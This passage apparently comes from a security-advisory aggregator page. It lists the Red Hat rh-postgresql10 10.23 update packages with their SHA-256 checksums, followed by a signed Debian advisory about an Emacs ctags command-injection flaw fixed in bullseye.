*   BZ - 2113825 - CVE-2022-2625 postgresql: Extension scripts replace objects not belonging to the extension.
*   BZ - 2157611 - rh-postgresql10-postgresql: Update to the latest PostgreSQL version 10.23 \[rhscl-3.8.z\]

**Red Hat Software Collections (for RHEL Server) 1 for RHEL 7**

SRPM

rh-postgresql10-postgresql-10.23-1.el7.src.rpm

SHA-256: a9016c7c733d380a5476508e8bfe7d0ef4cfdabb764f7d61de64b926ba87467d

x86\_64

rh-postgresql10-postgresql-10.23-1.el7.x86\_64.rpm

SHA-256: 9e8e137de06799180dcda9945ad969f97474c8d1de36c4d13c0c3c7a9d792025

rh-postgresql10-postgresql-contrib-10.23-1.el7.x86\_64.rpm

SHA-256: 50c4d2a5e03b9083146c5bf6457bf5e85699f25466c692919c5b85c3fd6f698b

rh-postgresql10-postgresql-contrib-syspaths-10.23-1.el7.x86\_64.rpm

SHA-256: 819b433bd854c822822c4cde614e79412fb5643345ad34fa3346095abee28db8

rh-postgresql10-postgresql-debuginfo-10.23-1.el7.x86\_64.rpm

SHA-256: eca99649c1388b889f28e5aefd7258eaa39728cb02d51aa56db302cd03fbc6dd

rh-postgresql10-postgresql-devel-10.23-1.el7.x86\_64.rpm

SHA-256: 2785082807d70a56c48e1d9705a61e92f637bf0727e882e5981a43aa9218beb7

rh-postgresql10-postgresql-docs-10.23-1.el7.x86\_64.rpm

SHA-256: 7287e787bce8ed2846c082fbaaa0a15d792ae37dcad67724d05d8159a6a3e6ed

rh-postgresql10-postgresql-libs-10.23-1.el7.x86\_64.rpm

SHA-256: 13fd021d8e50d783f69e246cd3b922c2116d6b4238e937d3e5dcd31a6f07e084

rh-postgresql10-postgresql-plperl-10.23-1.el7.x86\_64.rpm

SHA-256: 4dc346633af3d9ef6b44e187020ba5e6ffa074680eceb4ab3e539a0ddd1935d4

rh-postgresql10-postgresql-plpython-10.23-1.el7.x86\_64.rpm

SHA-256: ddaa99baa1524419459149cc6189e6235ea34d939a47416a8b86cdf943059909

rh-postgresql10-postgresql-pltcl-10.23-1.el7.x86\_64.rpm

SHA-256: 65c937d1b09ba6e386a072c301cad9a0ccd6a8ba69664919afdfcee925611f4d

rh-postgresql10-postgresql-server-10.23-1.el7.x86\_64.rpm

SHA-256: 564b2fe0a795de2065c4a219a67c01ccacbb7e858a6422acaa8a893cc4f643b4

rh-postgresql10-postgresql-server-syspaths-10.23-1.el7.x86\_64.rpm

SHA-256: 78d23898ec3c1a6f8bfe577634e480e6687a11eca0e10d755fb2839a7d60de02

rh-postgresql10-postgresql-static-10.23-1.el7.x86\_64.rpm

SHA-256: 61686f8cddb237cdccd6bbffb771c22a7ca0854322641d3ca235c63466782d4e

rh-postgresql10-postgresql-syspaths-10.23-1.el7.x86\_64.rpm

SHA-256: cde1968ca15b24c42f5a51967b4a8a2dbaa2ad962de52959887ff0063bc55804

rh-postgresql10-postgresql-test-10.23-1.el7.x86\_64.rpm

SHA-256: 95ed1005a6f7a6028d1fb7a47a3efbf06ce22a6a473f5773e7d934b67fc1d8cf

**Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7**

SRPM

rh-postgresql10-postgresql-10.23-1.el7.src.rpm

SHA-256: a9016c7c733d380a5476508e8bfe7d0ef4cfdabb764f7d61de64b926ba87467d

s390x

rh-postgresql10-postgresql-10.23-1.el7.s390x.rpm

SHA-256: af8537492b5e222bb9da33a9f134429e3a4a47adcc9ebc73d3089dc4144ac214

rh-postgresql10-postgresql-contrib-10.23-1.el7.s390x.rpm

SHA-256: 397b0a7c2c509fdb28b9bc66f9dc0d22a8dda0d0f6cb55e7fdf83db1222242f9

rh-postgresql10-postgresql-contrib-syspaths-10.23-1.el7.s390x.rpm

SHA-256: ae0041713fe436386c8f3fc6871ce71583ae997ee083c346ca92d1ad2d97da31

rh-postgresql10-postgresql-debuginfo-10.23-1.el7.s390x.rpm

SHA-256: bc2754118c020d5478b535c889a0b92fe3a0e567b463037ada9c6a1e33e11f14

rh-postgresql10-postgresql-devel-10.23-1.el7.s390x.rpm

SHA-256: fdf12904b623f6b46fe6ca58534340b06509977b116126aa700a75b8db2ca93d

rh-postgresql10-postgresql-docs-10.23-1.el7.s390x.rpm

SHA-256: f037a2c8d0fa74c0289fa815d08c6fb05c5728b88e5f5dc0a4d2fd87bab6fd71

rh-postgresql10-postgresql-libs-10.23-1.el7.s390x.rpm

SHA-256: c44cca713734714538a3005d0a3ba41daf6eda28333731479838137dbd36663d

rh-postgresql10-postgresql-plperl-10.23-1.el7.s390x.rpm

SHA-256: 7ded767983f0fd180379e5f5d78445d4ca2c16d08299f0377d9d3deeddcd092c

rh-postgresql10-postgresql-plpython-10.23-1.el7.s390x.rpm

SHA-256: 7666cde9bf161f8eca8de4fa93474be9ed03ad2293bc6a265ef2dcfbce922923

rh-postgresql10-postgresql-pltcl-10.23-1.el7.s390x.rpm

SHA-256: 91eb6d5a2f6a220d10dfe13256ca88e45ba0bfdf4d818bb5adfac33c725d7535

rh-postgresql10-postgresql-server-10.23-1.el7.s390x.rpm

SHA-256: 4bda45bed83e94085d214d00ca0a0b636f8549494caafa7821e3164caab95a6d

rh-postgresql10-postgresql-server-syspaths-10.23-1.el7.s390x.rpm

SHA-256: 787a0695ba91fe27e5f035b8507b58bd06ca8adae75080c2f76de5c445782291

rh-postgresql10-postgresql-static-10.23-1.el7.s390x.rpm

SHA-256: 1e289ec54e74433febba2a79aee749da9188889c0bf4d16fcc9258f591c9fbae

rh-postgresql10-postgresql-syspaths-10.23-1.el7.s390x.rpm

SHA-256: 37efedd8568471c57c7b1d5cd986efb54902eb02019a604dda7c1d4fd8e8dbeb

rh-postgresql10-postgresql-test-10.23-1.el7.s390x.rpm

SHA-256: 0c8c206e27ce9308bea4f70db28f44093c6cc65a80bd679e9351870d3580cb2d

**Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7**

SRPM

rh-postgresql10-postgresql-10.23-1.el7.src.rpm

SHA-256: a9016c7c733d380a5476508e8bfe7d0ef4cfdabb764f7d61de64b926ba87467d

ppc64le

rh-postgresql10-postgresql-10.23-1.el7.ppc64le.rpm

SHA-256: 3a975bd0df861487042a234a4d0bbb68856d5cbeb67c5826a97aefd444ea705c

rh-postgresql10-postgresql-contrib-10.23-1.el7.ppc64le.rpm

SHA-256: c2250f60b815defcd8379cb63e1ea3c7073af8ed35b75f3dc9dcb002551fae00

rh-postgresql10-postgresql-contrib-syspaths-10.23-1.el7.ppc64le.rpm

SHA-256: 58aa16ce0eaa60d74fc29422dbbe3ebff0f5a490c15f48050a6b0ab4e88f9a0e

rh-postgresql10-postgresql-debuginfo-10.23-1.el7.ppc64le.rpm

SHA-256: b819a3d165143edd6283e8c43d029af2d61e06519fb2a02d9f03d91bbaf93cd2

rh-postgresql10-postgresql-devel-10.23-1.el7.ppc64le.rpm

SHA-256: 1cd40e1dc4a2cabbde656ddbe9c1f022aabc20750393d21caeed9ad8d398fbfe

rh-postgresql10-postgresql-docs-10.23-1.el7.ppc64le.rpm

SHA-256: ba6a8e4781b89f30da58e84806d986e0dfe1ad86666ce8e335d4e0b550eaeab8

rh-postgresql10-postgresql-libs-10.23-1.el7.ppc64le.rpm

SHA-256: 2e36bf7f18cd587c570339c06b37220ab80fa2d78f868d7006590ba2818d6526

rh-postgresql10-postgresql-plperl-10.23-1.el7.ppc64le.rpm

SHA-256: 2e48e0649b741657737406537adf368fd705e3c8428f4ae36b30142199109e6b

rh-postgresql10-postgresql-plpython-10.23-1.el7.ppc64le.rpm

SHA-256: 3938a0b02c25c808c434635dd9e6d9d8ace897f0845cde20dc97c36745dc8430

rh-postgresql10-postgresql-pltcl-10.23-1.el7.ppc64le.rpm

SHA-256: 557d8c5805558f8c470e0673bdd9c2fb4fcb8ec431686c51ed42bdb9b0e0508e

rh-postgresql10-postgresql-server-10.23-1.el7.ppc64le.rpm

SHA-256: 24de036895da83e764f5b0623a96f969103d8806c5fed7bb44386d821ebb2377

rh-postgresql10-postgresql-server-syspaths-10.23-1.el7.ppc64le.rpm

SHA-256: 07defd5c53809d2ffebdb084f39e96a40fff505a7b42e58f24a856b1fda4b780

rh-postgresql10-postgresql-static-10.23-1.el7.ppc64le.rpm

SHA-256: 544282847f4d9fc629b6aad77bab0ae6a341e8b9fd0a8f4aa044a0480b1aa77c

rh-postgresql10-postgresql-syspaths-10.23-1.el7.ppc64le.rpm

SHA-256: 4bbba2a2c9b465671a078a2bd18c4a72a14c31fe380cd234d1d70b423bf9b0e5

rh-postgresql10-postgresql-test-10.23-1.el7.ppc64le.rpm

SHA-256: de4bc7ff09d29df834a411b7cf29b4f6e46c8048fc440428a424857b7e6ca685

**Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7**

SRPM

rh-postgresql10-postgresql-10.23-1.el7.src.rpm

SHA-256: a9016c7c733d380a5476508e8bfe7d0ef4cfdabb764f7d61de64b926ba87467d

x86\_64

rh-postgresql10-postgresql-10.23-1.el7.x86\_64.rpm

SHA-256: 9e8e137de06799180dcda9945ad969f97474c8d1de36c4d13c0c3c7a9d792025

rh-postgresql10-postgresql-contrib-10.23-1.el7.x86\_64.rpm

SHA-256: 50c4d2a5e03b9083146c5bf6457bf5e85699f25466c692919c5b85c3fd6f698b

rh-postgresql10-postgresql-contrib-syspaths-10.23-1.el7.x86\_64.rpm

SHA-256: 819b433bd854c822822c4cde614e79412fb5643345ad34fa3346095abee28db8

rh-postgresql10-postgresql-debuginfo-10.23-1.el7.x86\_64.rpm

SHA-256: eca99649c1388b889f28e5aefd7258eaa39728cb02d51aa56db302cd03fbc6dd

rh-postgresql10-postgresql-devel-10.23-1.el7.x86\_64.rpm

SHA-256: 2785082807d70a56c48e1d9705a61e92f637bf0727e882e5981a43aa9218beb7

rh-postgresql10-postgresql-docs-10.23-1.el7.x86\_64.rpm

SHA-256: 7287e787bce8ed2846c082fbaaa0a15d792ae37dcad67724d05d8159a6a3e6ed

rh-postgresql10-postgresql-libs-10.23-1.el7.x86\_64.rpm

SHA-256: 13fd021d8e50d783f69e246cd3b922c2116d6b4238e937d3e5dcd31a6f07e084

rh-postgresql10-postgresql-plperl-10.23-1.el7.x86\_64.rpm

SHA-256: 4dc346633af3d9ef6b44e187020ba5e6ffa074680eceb4ab3e539a0ddd1935d4

rh-postgresql10-postgresql-plpython-10.23-1.el7.x86\_64.rpm

SHA-256: ddaa99baa1524419459149cc6189e6235ea34d939a47416a8b86cdf943059909

rh-postgresql10-postgresql-pltcl-10.23-1.el7.x86\_64.rpm

SHA-256: 65c937d1b09ba6e386a072c301cad9a0ccd6a8ba69664919afdfcee925611f4d

rh-postgresql10-postgresql-server-10.23-1.el7.x86\_64.rpm

SHA-256: 564b2fe0a795de2065c4a219a67c01ccacbb7e858a6422acaa8a893cc4f643b4

rh-postgresql10-postgresql-server-syspaths-10.23-1.el7.x86\_64.rpm

SHA-256: 78d23898ec3c1a6f8bfe577634e480e6687a11eca0e10d755fb2839a7d60de02

rh-postgresql10-postgresql-static-10.23-1.el7.x86\_64.rpm

SHA-256: 61686f8cddb237cdccd6bbffb771c22a7ca0854322641d3ca235c63466782d4e

rh-postgresql10-postgresql-syspaths-10.23-1.el7.x86\_64.rpm

SHA-256: cde1968ca15b24c42f5a51967b4a8a2dbaa2ad962de52959887ff0063bc55804

rh-postgresql10-postgresql-test-10.23-1.el7.x86\_64.rpm

SHA-256: 95ed1005a6f7a6028d1fb7a47a3efbf06ce22a6a473f5773e7d934b67fc1d8cf

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:0160: Red Hat Security Advisory: rh-postgresql10-postgresql security and bug fix update

Debian Linux Security Advisory 5314-1 - It was discovered that missing input sanitising in the ctags functionality of Emacs may result in the execution of arbitrary shell commands.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5314-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
January 11, 2023                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : emacs  
CVE ID         : CVE-2022-45939  
Debian Bug     : 1025009

It was discovered that missing input sanitising in the ctags functionality  
of Emacs may result in the execution of arbitrary shell commands.

For the stable distribution (bullseye), this problem has been fixed in  
version 1:27.1+1-3.1+deb11u1.

We recommend that you upgrade your emacs packages.

For the detailed security status of emacs please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/emacs

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmO/Bk8ACgkQEMKTtsN8  
TjYecBAAsKhcrCNNMAymVbFW1PhpPWkp6KVpYbbj/vGnfeJCTTUnilZqirvHMXnI  
of4dhj9qCsmzB3tSFzEXuo/ek475XY3qig2t6vJJzlARiDHaBuU7R0z39LifcaNE  
EO8ByAnMilxZjqOv7qgobG0wUmXzWlJT8SuGK5OXbnPH27++7W26YW1ccsSSjn0l  
m3aKlWiMsKABmaj7NfqY+dauDI/t+MOg85bXDNrjJsO8SLfCcWZiDtb0qbvHarNk  
1T+yMPPFARSvM4KIvrUx0ENxjUuvugUtJqjcK9Prp27WB3kn8y387H+Y5SOFQSOy  
cSqrlWcO9ZUfjuDmyKP3kEkg8wDrKI2E4F1oTZpu+Xz44ysueE6nK62b/G+FY4vO  
pVqrWAE1bILyuGyhM/U4/PkpwGyC5je3cIFnyjigtUH3citcpyW8r8uvBqn20ARc  
12hsMD8PgQNt7xOm69+Ksf0oRyPJzMPjqQfjwWOwbnviPLBeq0CwxQZPECumzj87  
nkOAWjAvPqrCtHdO945XIsbyk1sM+TLIe+gGFPxYniVfyp8TXWz/DcyepciZ+aqB  
N3aoL4CB65JpHtq9SovdbFPRoG1hrvzfqWmiaYw9+/FO1nCe6PcC5lK1f6yr/E0T  
I0iy4CwqoCtuPk+jHG9xXjxqt2Ylo514R8CvHdHri+HhSLj8QaA=  
=gd6B  
-----END PGP SIGNATURE-----

Tag

#linux